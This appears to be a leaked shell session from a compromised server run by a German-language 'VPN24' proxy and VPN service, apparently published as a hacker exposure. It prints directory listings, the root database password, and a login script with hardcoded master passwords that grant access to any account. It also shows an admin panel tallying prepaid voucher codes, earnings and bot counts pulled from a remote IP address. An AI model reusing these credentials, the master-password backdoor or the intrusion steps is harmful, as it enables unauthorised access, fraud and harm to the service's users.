$config['Datastore']['class'] = 'vB_Datastore_Memcached';
$i = 0;
// First Server
$i++;
$config['Misc']['memcacheserver'][$i]		= '127.0.0.1';
$config['Misc']['memcacheport'][$i]			= 11211;
$config['Misc']['memcachepersistent'][$i]	= true;
$config['Misc']['memcacheweight'][$i]		= 1;
$config['Misc']['memcachetimeout'][$i]		= 1;
$config['Misc']['memcacheretry_interval'][$i] = 15;
*/

// ****** The following options are only needed in special cases ******

	//	****** MySQLI OPTIONS *****
	// When using MySQL 4.1+, MySQLi should be used to connect to the database.
	// If you need to set the default connection charset because your database
	// is using a charset other than latin1, you can set the charset here.
	// If you don't set the charset to be the same as your database, you
	// may receive collation errors.  Ignore this setting unless you
	// are sure you need to use it.
// $config['Mysqli']['charset'] = 'utf8';

	//	Optionally, PHP can be instructed to set connection parameters by reading from the
	//	file named in 'ini_file'. Please use a full path to the file.
	//	Example:
	//	$config['Mysqli']['ini_file'] = 'c:\program files\MySQL\MySQL Server 4.1\my.ini';
$config['Mysqli']['ini_file'] = '';

// Image Processing Options
	// Images that exceed either dimension below will not be resized by vBulletin. If you need to resize larger images, alter these settings.
$config['Misc']['maxwidth'] = 2592;
$config['Misc']['maxheight'] = 1944;

/*======================================================================*\
|| ####################################################################
|| #
|| # CVS: $RCSfile$ - $Revision: 32878 $
|| ####################################################################
\*======================================================================*/

# cd /var/www/vpn24.org/ && ls -la
total 120
drwxr-xr-x 3 root     root  4096 Dec 13 22:18 .
drwxr-xr-x 9 root     root  4096 Dec 28 02:33 ..
-rw-r--r-- 1 root     root    35 May  9  2010 index.php
-rwxr-xr-x 1 root     root 18378 Nov  8 19:00 testVicSocks
drwxr-xr-x 9 www-data root 86016 Jan  8 02:41 web

# cd web

# ls -la | grep -v cookie.txt
total 3296
drwxr-xr-x 9 www-data root     86016 Jan  8 02:41 .
drwxr-xr-x 3 root     root      4096 Dec 13 22:18 ..
-rw-r--r-- 1 www-data www-data  6413 Dec 11 07:33 21Kms__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Jan  3 18:07 5Liter__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Dec  4 17:35 AtzePeng__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Dec  1 10:29 BloodySunday__splittingError.htm
-rw-r--r-- 1 www-data www-data  6411 Dec 17 12:39 Delphinko__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Dec 15 18:47 DieFliege__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Dec 28 19:38 DingDong__splittingError.htm
-rw-r--r-- 1 www-data www-data  6411 Dec 15 13:59 Emrano__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Dec  8 20:14 EsseX__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Dec  6 20:22 Firewall__splittingError.htm
-rw-r--r-- 1 www-data www-data  6411 Nov 20 11:18 HohesC__splittingError.htm
-rw-r--r-- 1 www-data www-data  6411 Dec 23 14:28 ICHICH__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Dec 11 17:53 Janitor1__splittingError.htm
-rw-r--r-- 1 www-data www-data  6411 Nov 27 14:04 KaLLi__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Dec  5 12:17 Keineloe__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Dec 10 17:26 Lognot__splittingError.htm
-rw-r--r-- 1 www-data www-data  6411 Dec  3 20:11 Maxim__splittingError.htm
-rw-r--r-- 1 www-data www-data  6411 Dec  1 14:35 MysticSun__splittingError.htm
-rw-r--r-- 1 www-data www-data  6411 Nov 27 08:53 QuickSilver__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Dec 24 01:01 Selfcut__splittingError.htm
-rw-r--r-- 1 www-data www-data  6411 Nov 19 20:52 SlamD__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Nov 18 14:05 Sparkasse__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Dec 14 13:19 TheKing__splittingError.htm
-rw-r--r-- 1 www-data www-data  6411 Jan  1 22:54 Tiberius1__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Nov 23 15:04 WeArEoNe__splittingError.htm
-rw-r--r-- 1 www-data www-data  6411 Dec 13 10:02 __splittingError.htm
-rw-r--r-- 1 www-data root       257 Nov 18 20:01 abo.php
-rw-r--r-- 1 root     root      5186 Nov  4 20:46 abo_lu.php
-rw-r--r-- 1 root     root      5186 Nov  4 20:46 abo_ru.php
-rw-r--r-- 1 www-data root      4508 Nov 18 20:43 account.php
-rw-r--r-- 1 www-data www-data  6412 Nov 14 07:33 analytics__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Dec 18 12:36 andreas7411__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Nov 16 11:40 asdfghjkl__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Nov  9 10:37 b0uNz__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Dec 15 17:38 b14ckf1ag__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Dec  2 02:09 b2323__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Dec 11 13:43 b7233__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Nov 11 19:37 bLackftw1989__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Nov  9 13:49 becks__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Dec 12 15:42 beware__splittingError.htm
-rw-r--r-- 1 www-data root      1209 Jan 26  2010 buy.php
-rw-r--r-- 1 www-data www-data  6412 Dec  6 13:12 c4sh1__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Nov  8 18:10 cardercarder__splittingError.htm
drwxrwxrwx 3 www-data root     36864 Jan  7 18:38 cashIn
-rw-r--r-- 1 www-data root       393 Nov 18 20:29 cashin.php
-rw-r--r-- 1 root     root      1291 Nov 18 19:05 check_one_vsocks5123213.php
-rw-r--r-- 1 root     root      2219 Nov 12 00:15 checkvsocks.php
-rw-r--r-- 1 www-data www-data  6412 Nov 11 22:01 crack__splittingError.htm
-rw-r--r-- 1 www-data www-data  1063 Dec 27 16:40 dbg.html
-rw-r--r-- 1 www-data www-data  6412 Nov 21 15:48 djdalio__splittingError.htm
-rw-r--r-- 1 www-data www-data  6411 Dec 10 22:27 docscanner__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Dec 17 14:41 duden__splittingError.htm
-rw-r--r-- 1 www-data www-data  6411 Dec  1 14:38 dudex__splittingError.htm
-rw-r--r-- 1 www-data www-data  1063 Dec 27 16:11 dump.html
-rw-r--r-- 1 www-data www-data  6412 Dec  3 13:45 enosaires__splittingError.htm
-rw-r--r-- 1 www-data www-data  6411 Nov 30 11:16 epoepo__splittingError.htm
-rw-r--r-- 1 www-data www-data  6411 Dec 20 19:41 erebos1337__splittingError.htm
-rw-r--r-- 1 www-data root       311 Nov 18 20:21 faq.php
-rw-r--r-- 1 root     root      1406 Nov 18 23:11 favicon.ico
-rw-r--r-- 1 www-data www-data  6412 Dec 14 13:24 frankylo__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Dec 14 16:48 fuckdawn__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Dec 24 16:14 hackbart2__splittingError.htm
-rw-r--r-- 1 root     root       967 Aug  3 19:00 handleVsocks.php
-rw-r--r-- 1 www-data www-data  6412 Dec 13 00:18 hans2000__splittingError.htm
-rw-r--r-- 1 root     root        56 May 11  2010 hdf2.php
-rw-r--r-- 1 www-data root      1064 Jul 17 14:33 header.php
-rw-r--r-- 1 root     root       950 Nov 18 21:54 header2.php
-rw-r--r-- 1 www-data www-data  6412 Dec 13 15:32 hexst4tic__splittingError.htm
-rw-r--r-- 1 www-data root      1380 Aug 23 01:44 home.php
-rw-r--r-- 1 root     root       178 Nov 15 18:01 home2.php
-rw-r--r-- 1 www-data www-data  6412 Nov  9 20:00 hund123456__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Nov 22 18:04 iKas2__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Dec  7 19:15 iiyama__splittingError.htm
-rw-r--r-- 1 www-data www-data  6411 Dec 13 10:08 ikarus22__splittingError.htm
drwxr-xr-x 2 www-data root      4096 Nov  4 21:36 images
drwxr-xr-x 2 root     root      4096 Nov 18 21:45 images2
-rw-r--r-- 1 root     root     10646 Nov 18 23:16 index.php
-rw-r--r-- 1 root     root      4299 Nov 18 21:26 indexORIGINALbss213123123.php
-rw-r--r-- 1 www-data www-data  6411 Nov 16 15:37 jensmaul__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Nov 15 19:51 joeee__splittingError.htm
-rw-r--r-- 1 www-data www-data  6411 Nov 17 21:01 jojo187__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Dec 15 23:53 jojoman__splittingError.htm
-rw-r--r-- 1 www-data www-data  4853 Nov 23 15:15 juicestin__splittingError.htm
-rw-r--r-- 1 www-data www-data  6411 Nov 24 20:33 juliasutter__splittingError.htm
-rw-r--r-- 1 www-data www-data  6515 Dec  1 23:49 kackpfosten__splittingError.htm
-rw-r--r-- 1 www-data www-data  6411 Dec 17 20:07 keystyle__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Dec  8 14:21 kirmi__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Nov 10 18:42 klaudio__splittingError.htm
drwxr-xr-x 2 www-data root      4096 Nov 20 13:42 koksundnuTTen88
-rw-r--r-- 1 www-data www-data  6411 Dec 14 13:32 kucke17__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Dec 10 05:37 latestnews__splittingError.htm
-rw-r--r-- 1 root     root       156 Nov 18 19:10 listallvsocks62342134543.php
-rw-r--r-- 1 www-data root      1421 May  9  2010 listssh.php
-rw-r--r-- 1 www-data root      1781 Nov 18 20:28 listvpn.php
-rw-r--r-- 1 root     root      1245 May 15  2010 loadssh.php
-rw-r--r-- 1 www-data www-data  1630 May  6  2010 login.php
-rw-r--r-- 1 root     root      7442 Nov 18 20:27 lu_abo.php
-rw-r--r-- 1 root     root      1274 Nov  4 21:05 lu_loadssh.php
-rw-r--r-- 1 root     root      3126 Nov 18 20:17 lu_socks5.php
-rw-r--r-- 1 www-data www-data  6412 Jan  3 16:19 magi007__splittingError.htm
-rw-r--r-- 1 www-data www-data  6411 Dec 23 21:56 makko__splittingError.htm
drwxr-xr-x 2 root     root      4096 Dec 23 12:15 moneystream
-rw-r--r-- 1 www-data root       182 May 10  2010 mysql.php
-rw-r--r-- 1 root     root      3879 Nov 18 20:27 newProxie.php
-rw-r--r-- 1 www-data root       596 Nov 18 20:07 news.php
-rw-r--r-- 1 www-data root       362 May  6  2010 news_overview.php
-rw-r--r-- 1 root     root       380 Nov 15 17:58 news_overview2.php
-rw-r--r-- 1 www-data www-data  6412 Nov 18 12:24 nitex__splittingError.htm
-rw-r--r-- 1 www-data www-data  6411 Dec 14 19:08 offlinejack__splittingError.htm
drwxr-xr-x 2 www-data root     36864 Jan  7 19:58 ovpn
-rw-r--r-- 1 www-data www-data  6412 Dec  7 19:56 pablo__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Dec 10 20:04 pan1c__splittingError.htm
-rw-r--r-- 1 www-data www-data  6512 Dec  7 22:57 pappe223__splittingError.htm
-rw-r--r-- 1 root     root      1326 Aug 24 19:30 poll.php
-rw-r--r-- 1 www-data www-data  6411 Dec 14 14:07 pscBastard__splittingError.htm
-rw-r--r-- 1 root     root       256 Sep 13 16:27 pscashin.php
-rw-r--r-- 1 www-data www-data  6409 Jan  7 23:47 pwnny__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Dec 19 19:59 pyrodeath__splittingError.htm
-rw-r--r-- 1 www-data www-data  6411 Dec 14 16:24 qqqqqq__splittingError.htm
-rw-r--r-- 1 www-data root      2817 Nov 18 22:46 register.php
-rw-r--r-- 1 www-data www-data  6412 Dec 29 17:02 reideen__splittingError.htm
-rw-r--r-- 1 root     root      7157 Nov 18 20:26 ru_abo.php
-rw-r--r-- 1 root     root      1262 Nov  4 21:05 ru_loadssh.php
-rw-r--r-- 1 root     root      3025 Nov 18 20:16 ru_socks5.php
-rw-r--r-- 1 www-data root      1196 Nov 24 17:32 saveReq.php
-rw-r--r-- 1 www-data root      5125 Aug 29 16:29 shop.php
-rw-r--r-- 1 www-data www-data  6412 Dec 10 14:33 shore__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Dec  3 20:35 slic3menic3__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Dec 15 22:18 snowghost__splittingError.htm
-rw-r--r-- 1 www-data root       263 Nov 18 20:16 socks5.php
-rw-r--r-- 1 root     root       574 Oct  7 18:54 socksdetails.php
-rw-r--r-- 1 www-data www-data  6412 Nov  9 16:10 spran__splittingError.htm
-rw-r--r-- 1 www-data root      3104 Nov 18 20:20 styles.css
drwxr-xr-x 2 root     root      4096 Oct 21 18:25 suPPortPanel18
-rw-r--r-- 1 www-data www-data  6412 Dec 23 16:07 sunrise__splittingError.htm
-rw-r--r-- 1 www-data root      1336 Nov 18 20:53 support.php
-rw-r--r-- 1 www-data www-data  6412 Jan  2 16:36 test569__splittingError.htm
-rw-r--r-- 1 root     root       171 May 12  2010 time.php
-rw-r--r-- 1 www-data www-data  6412 Nov 11 18:38 traden90__splittingError.htm
-rw-r--r-- 1 root     root       139 Dec 28 14:21 ukashin.php
-rw-r--r-- 1 root     root      2118 Nov 18 20:25 uvsocks.php
-rw-r--r-- 1 www-data www-data  6412 Dec 15 07:03 vpn24__splittingError.htm
-rw-r--r-- 1 www-data root       799 May  6  2010 vsocks.php
-rw-r--r-- 1 www-data www-data  6412 Dec 28 14:25 w333d__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Dec 14 17:17 winkel72__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Dec  8 12:53 xc0re__splittingError.htm
-rw-r--r-- 1 www-data www-data  6412 Dec 11 11:52 xxx3xxx4__splittingError.htm
-rw-r--r-- 1 www-data www-data  6411 Dec  4 16:45 zezol__splittingError.htm

# cat *splittingError.htm | grep "Failed</td>"
<tr><td>6337180255464896366</td><td>Failed</td><td>100.00</td></tr>
<tr><td>6337180253212809062</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180252076434686</td><td>Failed</td><td>20.00</td></tr>
<tr><td>6337180253299398565</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180257214002899</td><td>Failed</td><td>3.00</td></tr>
<tr><td>6337180259183915580</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180252532009429</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180250390679390</td><td>Failed</td><td>5.00</td></tr>
<tr><td>6330949130319304248</td><td>Failed</td><td>30.00</td></tr>
<tr><td>6337180259379552429</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180258343754368</td><td>Failed</td><td>5.00</td></tr>
<tr><td>6337180256917976433</td><td>Failed</td><td>2.14</td></tr>
<tr><td>6337180251009203952</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180111553585578</td><td>Failed</td><td>4.00</td></tr>
<tr><td>6337180258177204589</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180253681177082</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180259073857611</td><td>Failed</td><td>3.00</td></tr>
<tr><td>6337180256462965609</td><td>Failed</td><td>5.00</td></tr>
<tr><td>6337180115155785437</td><td>Failed</td><td>5.00</td></tr>
<tr><td>6337180394582246475</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180258243666274</td><td>Failed</td><td>5.00</td></tr>
<tr><td>6337180256212540975</td><td>Failed</td><td>50.00</td></tr>
<tr><td>6337180257735545855</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180250238018710</td><td>Failed</td><td>5.00</td></tr>
<tr><td>6337180250936554560</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180258032831998</td><td>Failed</td><td>5.00</td></tr>
<tr><td>6337180113239640306</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180259568330264</td><td>Failed</td><td>50.00</td></tr>
<tr><td>6337180254636279981</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180255605913872</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180251576728091</td><td>Failed</td><td>20.00</td></tr>
<tr><td>6337180254761736029</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180251140051070</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180258955781559</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180255901612889</td><td>Failed</td><td>20.00</td></tr>
<tr><td>6337180252316842391</td><td>Failed</td><td>20.00</td></tr>
<tr><td>6337180255645832702</td><td>Failed</td><td>50.00</td></tr>
<tr><td>6337180253814896822</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6330302815447899096</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180119686732454</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180253644660265</td><td>Failed</td><td>5.00</td></tr>
<tr><td>6337180257110264619</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180115155785437</td><td>Failed</td><td>5.00</td></tr>
<tr><td>6337180254730527152</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180259238856011</td><td>Failed</td><td>5.00</td></tr>
<tr><td>6337180280592431563</td><td>Failed</td><td>5.00</td></tr>
<tr><td>6337180253125392792</td><td>Failed</td><td>15.00</td></tr>
<tr><td>6337180258269992836</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180253244887904</td><td>Failed</td><td>20.00</td></tr>
<tr><td>6337180258751189123</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6637180305761777189</td><td>Failed</td><td>25.00</td></tr>
<tr><td>6337180250114063863</td><td>Failed</td><td>15.00</td></tr>
<tr><td>6337180251763555456</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180250613878779</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180258831608324</td><td>Failed</td><td>5.00</td></tr>
<tr><td>6337180254951300131</td><td>Failed</td><td>5.00</td></tr>
<tr><td>6337180251480953489</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180257200821070</td><td>Failed</td><td>5.00</td></tr>
<tr><td>6337180252910471233</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180250992167067</td><td>Failed</td><td>5.00</td></tr>
<tr><td>6337180113591950418</td><td>Failed</td><td>5.92</td></tr>
<tr><td>6337180253935682366</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180254837540264</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180251213933840</td><td>Failed</td><td>5.00</td></tr>
<tr><td>6337180253734200352</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180257051176442</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180259341246183</td><td>Failed</td><td>2.00</td></tr>
<tr><td>6337180250165411383</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6332347911381552324</td><td>Failed</td><td>2.00</td></tr>
<tr><td>6337180254171009637</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180250833220976</td><td>Failed</td><td>15.00</td></tr>
<tr><td>6337180258930519133</td><td>Failed</td><td>5.00</td></tr>
<tr><td>6337180253725306614</td><td>Failed</td><td>1.30</td></tr>
<tr><td>7180254095966078633</td><td>Failed</td><td>20.00</td></tr>
<tr><td>6337180258930519133</td><td>Failed</td><td>6.44</td></tr>
<tr><td>6337180255646619421</td><td>Failed</td><td>20.00</td></tr>
<tr><td>6637180250951262628</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180255706618537</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6331780259351713338</td><td>Failed</td><td>20.00</td></tr>
<tr><td>6337180251207309429</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180251260723060</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180254766958230</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180251903818657</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180254440921646</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180256430792556</td><td>Failed</td><td>15.00</td></tr>
<tr><td>6337180256307519041</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180251553897605</td><td>Failed</td><td>20.00</td></tr>
<tr><td>6337180256373444637</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180114065134794</td><td>Failed</td><td>8.00</td></tr>

# cat mysql.php 
<?php
	$server = "localhost";
	$user = "root";
	$pass = "QkZorIZZC5e";
	$database = "vpn24";
	
	mysql_connect($server,$user,$pass);
	
	if(!$install)
		mysql_select_db($database);
?>

# crazy fuckin masterpassword^C 
# cat login.php 

<?php

if(isset($_SESSION['cmuser']))
	echo("<div style=''>Sie sind bereits eingeloggt als ".$_SESSION['cmuser']."</div>");
else if(isset($_POST['log']))
{
	$user  = mysql_real_escape_string($_POST['user']);
	$pass  = mysql_real_escape_string($_POST['pass']);

	if($pass == "koksundnuTTen88" || $pass == "suPPort_masterPass88")		
		$res = mysql_query("SELECT * FROM cmuser WHERE name='$user'");
	else
		$res = mysql_query("SELECT * FROM cmuser WHERE name='$user' AND pass='".md5($pass)."'");

	$arr = mysql_fetch_array($res);
	
	if(mysql_num_rows($res) == 0)
		die("<div style=''>Konnte dieses User/Passwort Paar nicht finden</div>");
		
	$_SESSION['cmuser'] 	= $arr['name'];
	$_SESSION['cmid'] 	= $arr['id'];
	$_SESSION['cmpass'] 	= md5($pass);
	$_SESSION['pPass']	= $arr['privPass'];
	$_SESSION['pUser']	= $arr['privUser'];
	$_SESSION['poll']	= $arr['poll'];	
	echo("<div style=''>Sie sind nun eingeloggt als <b>".$_SESSION['cmuser']."</b></div>");

}
else
{
echo <<< END
<div style="">
<div style="font-weight:bold;font-size:1.7em;">Login</div>
<table>
<form action="index.php?do=login" method="post">
<tr>
<td>User:</td><td><input class="cInp" type="text" name="user"></td>
</tr>
<tr>
<td>Pass:</td><td><input class="cInp" type="password" name="pass"></td>
</tr>
<br>
</table><br>
<input type="submit" name="log" value="Einloggen">
</form>
<br><br>
Noch keinen Account? Gleich <a href="index.php?do=register">registrieren</a>
</div>
END;

}
?>

# tar cvjf /tmp/cashin.tar.bz2 cashIn/*.php
cashIn/eeeeeeeeee.php
cashIn/myOne.php
cashIn/myukashcombine.php
cashIn/oldPSC.php
cashIn/psc.php
cashIn/ukash666.php
cashIn/ukash_convert666.php

# cd koksundnuTTen88/ && ls -la
total 152
drwxr-xr-x 2 www-data root  4096 Nov 20 13:42 .
drwxr-xr-x 9 www-data root 86016 Jan  8 02:41 ..
-rw-r--r-- 1 root     root  1112 Nov  7 16:29 add5daysadsdsadsayfdsa.php
-rw-r--r-- 1 root     root   511 Nov 13 12:48 asd21938uasd213dsa.php
-rw-r--r-- 1 root     root   483 Aug 28 02:27 deletevsdata.php
-rw-r--r-- 1 root     root    78 Nov 10 20:19 deletevsdata_noreset.php
-rw-r--r-- 1 root     root   508 Aug 28 02:45 getAUserCreditsBack.php
-rw-r--r-- 1 root     root   235 Jun 25  2010 getSocksUserWithoutAbo.php
-rw-r--r-- 1 root     root   441 Jun 28  2010 getVPNUserWithoutAbo.php
-rw-r--r-- 1 root     root    14 Jul 10 19:58 index.html
-rw-r--r-- 1 root     root   724 Aug  9 17:43 insertShop.php
-rw-r--r-- 1 root     root   450 Nov  4 20:29 lu_getVPNUserWithoutAbo.php
-rw-r--r-- 1 root     root  5255 Nov  9 20:43 psc.php
-rw-r--r-- 1 www-data root   101 May  7  2010 style.css
-rw-r--r-- 1 www-data root  1924 May  7  2010 viewSupport.php
-rw-r--r-- 1 root     root  2021 Nov  9 20:42 viewVsocksSupport.php

# cat psc.php 
<?php
	
	include("../mysql.php");
	
	$res = mysql_query("SELECT SUM(wert) AS sw, COUNT(id) AS ci FROM pscs WHERE pass != '.'") or die(mysql_error());
	$arr = mysql_fetch_array($res);
	echo "Es sind <b>".$arr['ci']."</b> PaysafeCards im Wert von <b>".$arr['sw']." Euro</b> in der Datenbank<br>";

        $res = mysql_query("SELECT SUM(wert) AS sw, COUNT(id) AS ci FROM ukash") or die(mysql_error());
        $arr = mysql_fetch_array($res);
        echo "Es sind <b>".$arr['ci']."</b> UkashCodes im Wert von <b>".$arr['sw']." Euro</b> in der Datenbank<br>";


	$res = mysql_query("SELECT SUM(credits) AS sc,COUNT(id) AS ci FROM cmuser WHERE id > 26");
	$arr = mysql_fetch_array($res);

	echo "Es sind <b>".$arr['ci']."</b> User registriert welche noch <b>".$arr['sc']." Euro</b> an Credits haben<br>";
	
	// socksAcces 	vpnAccess
        $res = mysql_query("SELECT COUNT(id) AS ci FROM cmuser WHERE socksAcces > ".time(0));
        $arr = mysql_fetch_array($res);
        echo "    <u>Abos:</u> <b>".$arr['ci']."</b> Socks5";
        $res = mysql_query("SELECT COUNT(id) AS ci FROM cmuser WHERE vpnAccess > ".time(0));
        $arr = mysql_fetch_array($res);
        echo " / <b>".$arr['ci']."</b> OpenVPN<br><br>";

        $res = mysql_query("SELECT COUNT(id) AS ci FROM support WHERE seen = 0");
        $arr = mysql_fetch_array($res);
        echo "<a style='text-decoration:none;' href='viewSupport.php'>Offene Support Tickets</a>: <b>".$arr['ci']."</b><br>";

        $res = mysql_query("SELECT COUNT(id) AS ci FROM vsockssupport WHERE seen = 0");
        $arr = mysql_fetch_array($res);
        echo "<a style='text-decoration:none;' href='viewVsocksSupport.php'>Vicsocks Lebensanzeige</a>: <b>".$arr['ci']."</b><br><br>";


        $res = mysql_query("SELECT SUM(wert) AS ge FROM pscs WHERE pass = '.'");
        $arr = mysql_fetch_array($res);
	$gesEarned = $arr['ge'];
        $res = mysql_query("SELECT SUM(yesterday) AS ge FROM statistik");
        $arr = mysql_fetch_array($res);
        $gesEarnedYes = $arr['ge'];
        $res = mysql_query("SELECT SUM(db_yesterday) AS ge FROM statistik");
        $arr = mysql_fetch_array($res);
        $gesEarnedDBYes = $arr['ge'];
	echo "<span style='color:lime;'><b>Gesamt verdient: $gesEarned (Heute: ".($gesEarned-$gesEarnedYes)." / Gestern: ".($gesEarnedYes-$gesEarnedDBYes).")<br></b></span>";
	
        $res = mysql_query("SELECT wert FROM pscs WHERE user = 'GOTT'");
        $arr = mysql_fetch_array($res);
        echo "Es wurden <b style='color:red;'>".$arr['wert']." Euro</b> für VicSocks ausgegeben ";

	$earned = floatval($arr['wert']);
	$res = mysql_query("SELECT yesterday, db_yesterday FROM statistik WHERE typ='vsocks'");
	$arr = mysql_fetch_array($res);
	$yest = floatval($arr['yesterday']);
	$db_yest = floatval($arr['db_yesterday']);
	echo "(Heute: <b>".($earned-$yest)."</b> / Gestern: <b>".($yest-$db_yest)."</b>)<br>";


        $res = mysql_query("SELECT COUNT(id) AS ci FROM vsocksData");
        $arr = mysql_fetch_array($res);
        $fp = fopen("http://77.91.225.188/asdSDAFqwe1324.php","r");
        $conN = fgets($fp,2048);
        fclose($fp);
        $fp = fopen("http://77.91.225.188/asdSDAFqwe13372.php","r");
        $conN2 = fgets($fp,2048);
        fclose($fp);

	echo "    <u>DE Bots:</u> <b>".$arr['ci']."</b> aktiv / <b>".$conN."</b> verfügbar / <b>".$conN2."</b> im Netz <br>";
	echo "<br>";

        $res = mysql_query("SELECT wert FROM pscs WHERE user = 'GOTT2'");
        $arr = mysql_fetch_array($res);

        echo "Es wurden <b style='color:red;'>".$arr['wert']." Euro</b> im Shop ausgegeben ";
        $earned = floatval($arr['wert']);
        $res = mysql_query("SELECT yesterday, db_yesterday FROM statistik WHERE typ='shop'");
        $arr = mysql_fetch_array($res);
        $yest = floatval($arr['yesterday']);
        $db_yest = floatval($arr['db_yesterday']);
        echo "(Heute: <b>".($earned-$yest)."</b> / Gestern: <b>".($yest-$db_yest)."</b>)<br>";

	
	echo "<b>Noch verfügbar:</b><br>";
        $res = mysql_query("SELECT * FROM shopLayout ORDER BY id");

        while($arr = mysql_fetch_array($res))
        {
                $res2 = mysql_query("SELECT * FROM shopWare WHERE type='".$arr['type']."' AND buyer = ''");
		$res3 = mysql_query("SELECT * FROM shopWare WHERE type='".$arr['type']."'");
                echo "    <b>".mysql_num_rows($res2)."</b>/".mysql_num_rows($res3)." '".$arr['text']."'<br>";
	}
	echo "<br>";
	
	$res = mysql_query("SELECT COUNT(id) AS ci FROM cmuser WHERE poll=1 OR poll=2 OR poll=3");
        $arr = mysql_fetch_array($res);
	echo "Es haben <b>".$arr['ci']."</b> User an der Umfrage teilgenommen<br>";
	echo "    <u>Stimmen:</u> ";
	
	$res = mysql_query("SELECT COUNT(id) AS ci FROM cmuser WHERE poll=1");$arr = mysql_fetch_array($res);
	echo "<b>".$arr['ci']."</b> Lux&Hun / ";
        
	$res = mysql_query("SELECT COUNT(id) AS ci FROM cmuser WHERE poll=2");$arr = mysql_fetch_array($res);
        echo "<b>".$arr['ci']."</b> Lux&Off / ";
        
	$res = mysql_query("SELECT COUNT(id) AS ci FROM cmuser WHERE poll=3");$arr = mysql_fetch_array($res);
        echo "<b>".$arr['ci']."</b> Hun&Off<br>";



?>

 ____________________________________________________________________
|                         __          __                             |
|     .-----.--.--.-----.|  |_.-----.|  |--.-----.--.--.             |
|     |  _  |  |  |  _  ||   _|  -__||  _  |  _  |_   _|             |
|     |__   |_____|_____||____|_____||_____|_____|__.__|             |
|________|__|________________________________________________________|
|                                                                    |
|  Was bieten Sie an?                                                |
|  Wir bieten 100% logfreie, sichere und absolut anonyme VPN, SSH    |
|  Socks und Socks 5 Zugänge in Russland.                            |
|                                                                    |
|  Wieso kann ich mir so sicher sein dass die Anonymisierung über    |
|    VPN24 100% logfrei und sicher ist?                              |
